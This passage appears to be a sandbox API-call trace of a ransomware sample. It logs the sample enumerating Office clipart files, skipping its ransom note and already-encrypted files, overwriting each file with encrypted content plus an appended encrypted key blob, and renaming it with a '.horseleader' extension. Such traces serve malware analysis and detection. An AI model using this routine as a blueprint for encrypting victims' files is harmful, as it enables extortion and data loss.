Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 67 [0253.003] StrStrIW (lpFirst="AN04323_.WMF", lpSrch=".horseleader") returned 0x0 [0253.004] lstrcmpW (lpString1="AN04323_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.004] lstrcmpW (lpString1="AN04323_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.004] lstrlenW 
(lpString=".testttjffg") returned 11 [0253.004] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.004] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.004] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.004] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.005] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 67 [0253.005] StrStrW (lpFirst="AN04323_.WMF", lpSrch=".txt") returned 0x0 [0253.005] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2492) returned 1 [0253.005] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x9bc, lpOverlapped=0x0) returned 1 [0253.008] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff644, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.008] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x9bc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x9bc, lpOverlapped=0x0) returned 1 [0253.008] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.008] WriteFile (in: hFile=0x158, 
lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.008] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.009] CloseHandle (hObject=0x158) returned 1 [0253.009] GetProcessHeap () returned 0x780000 [0253.009] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.009] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.horseleader") returned 79 [0253.009] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf.horseleader")) returned 1 [0253.010] GetProcessHeap () returned 0x780000 [0253.010] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.010] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd14, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04326_.WMF", cAlternateFileName="")) returned 1 [0253.010] lstrcmpiW (lpString1="AN04326_.WMF", lpString2="Windows") returned -1 [0253.010] 
wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 67 [0253.010] StrStrIW (lpFirst="AN04326_.WMF", lpSrch=".horseleader") returned 0x0 [0253.011] lstrcmpW (lpString1="AN04326_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.011] lstrcmpW (lpString1="AN04326_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.011] lstrlenW (lpString=".testttjffg") returned 11 [0253.011] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.011] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.011] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.011] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.012] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 67 [0253.012] StrStrW (lpFirst="AN04326_.WMF", lpSrch=".txt") returned 0x0 [0253.012] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3348) returned 1 [0253.012] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xd14, lpOverlapped=0x0) returned 1 [0253.014] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff2ec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0253.014] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xd14, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xd14, lpOverlapped=0x0) returned 1 [0253.015] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.015] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.015] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.015] CloseHandle (hObject=0x158) returned 1 [0253.015] GetProcessHeap () returned 0x780000 [0253.015] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.015] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.horseleader") returned 79 [0253.015] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf.horseleader")) returned 1 [0253.016] GetProcessHeap () returned 0x780000 [0253.016] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.017] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, 
ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x513d5e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x10c8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04332_.WMF", cAlternateFileName="")) returned 1 [0253.017] lstrcmpiW (lpString1="AN04332_.WMF", lpString2="Windows") returned -1 [0253.017] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 67 [0253.017] StrStrIW (lpFirst="AN04332_.WMF", lpSrch=".horseleader") returned 0x0 [0253.017] lstrcmpW (lpString1="AN04332_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.017] lstrcmpW (lpString1="AN04332_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.017] lstrlenW (lpString=".testttjffg") returned 11 [0253.017] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.017] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.017] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.017] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.019] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 67 [0253.019] StrStrW (lpFirst="AN04332_.WMF", lpSrch=".txt") returned 0x0 [0253.019] GetFileSizeEx (in: hFile=0x158, 
lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4296) returned 1 [0253.019] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x10c8, lpOverlapped=0x0) returned 1 [0253.021] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffef38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.021] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x10c8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x10c8, lpOverlapped=0x0) returned 1 [0253.021] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.022] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.022] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.022] CloseHandle (hObject=0x158) returned 1 [0253.022] GetProcessHeap () returned 0x780000 [0253.022] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.022] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.horseleader") returned 79 [0253.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\AN04332_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf.horseleader")) returned 1 [0253.023] GetProcessHeap () returned 0x780000 [0253.023] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.023] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x513d5e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc9c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04355_.WMF", cAlternateFileName="")) returned 1 [0253.023] lstrcmpiW (lpString1="AN04355_.WMF", lpString2="Windows") returned -1 [0253.023] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 67 [0253.024] StrStrIW (lpFirst="AN04355_.WMF", lpSrch=".horseleader") returned 0x0 [0253.024] lstrcmpW (lpString1="AN04355_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.024] lstrcmpW (lpString1="AN04355_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.024] lstrlenW (lpString=".testttjffg") returned 11 [0253.024] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.024] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.024] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.024] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF" 
(normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.025] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 67 [0253.025] StrStrW (lpFirst="AN04355_.WMF", lpSrch=".txt") returned 0x0 [0253.025] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3228) returned 1 [0253.025] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xc9c, lpOverlapped=0x0) returned 1 [0253.027] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff364, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.027] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xc9c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xc9c, lpOverlapped=0x0) returned 1 [0253.027] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.028] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.028] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.028] CloseHandle (hObject=0x158) returned 1 [0253.028] GetProcessHeap () returned 0x780000 [0253.028] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.028] 
wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.horseleader") returned 79 [0253.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf.horseleader")) returned 1 [0253.029] GetProcessHeap () returned 0x780000 [0253.029] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.029] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x513d5e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x12c8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04369_.WMF", cAlternateFileName="")) returned 1 [0253.029] lstrcmpiW (lpString1="AN04369_.WMF", lpString2="Windows") returned -1 [0253.029] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 67 [0253.029] StrStrIW (lpFirst="AN04369_.WMF", lpSrch=".horseleader") returned 0x0 [0253.029] lstrcmpW (lpString1="AN04369_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.029] lstrcmpW (lpString1="AN04369_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.029] lstrlenW (lpString=".testttjffg") returned 11 [0253.030] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF", lpSrch=".testttjffg") returned 0x0 
[0253.030] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.030] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.030] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.030] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 67 [0253.030] StrStrW (lpFirst="AN04369_.WMF", lpSrch=".txt") returned 0x0 [0253.030] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4808) returned 1 [0253.031] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x12c8, lpOverlapped=0x0) returned 1 [0253.033] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffed38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.033] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x12c8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x12c8, lpOverlapped=0x0) returned 1 [0253.034] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.034] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 
[0253.034] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.034] CloseHandle (hObject=0x158) returned 1 [0253.034] GetProcessHeap () returned 0x780000 [0253.034] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.034] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.horseleader") returned 79 [0253.034] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf.horseleader")) returned 1 [0253.036] GetProcessHeap () returned 0x780000 [0253.036] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.036] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1384, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04384_.WMF", cAlternateFileName="")) returned 1 [0253.036] lstrcmpiW (lpString1="AN04384_.WMF", lpString2="Windows") returned -1 [0253.037] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 67 [0253.037] StrStrIW 
(lpFirst="AN04384_.WMF", lpSrch=".horseleader") returned 0x0 [0253.037] lstrcmpW (lpString1="AN04384_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.037] lstrcmpW (lpString1="AN04384_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.037] lstrlenW (lpString=".testttjffg") returned 11 [0253.037] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.037] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.037] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.037] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.038] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 67 [0253.038] StrStrW (lpFirst="AN04384_.WMF", lpSrch=".txt") returned 0x0 [0253.038] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4996) returned 1 [0253.038] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1384, lpOverlapped=0x0) returned 1 [0253.041] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffec7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.041] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1384, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
